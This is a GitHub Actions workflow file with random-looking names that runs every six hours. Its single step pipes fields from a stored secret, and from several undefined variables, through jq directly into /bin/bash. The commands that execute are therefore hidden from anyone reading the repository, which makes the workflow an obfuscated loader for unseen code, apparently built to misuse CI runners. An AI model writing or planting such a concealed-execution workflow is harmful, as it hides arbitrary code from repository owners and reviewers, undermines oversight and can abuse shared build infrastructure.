name: nongyuanxie1987

on:
  workflow_dispatch:
  schedule:
    - cron: '31 5/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: nongyuanxie1987
        env:
          ucl79631: ${{ secrets.ucl79631 }}
        run: |
          echo $ucl79631 | jq -r .hsn5 | /bin/bash
          echo $vv2724 | jq -r .endx7 | /bin/bash
          echo $itast37 | jq -r .ihxf6 | /bin/bash
          echo $ibeui5724 | jq -r .sfg99 | /bin/bash
          echo $v6942 | jq -r .bcsiw7866 | /bin/bash
          echo $hnl46 | jq -r .g153 | /bin/bash
          echo $l2 | jq -r .aqqf55 | /bin/bash

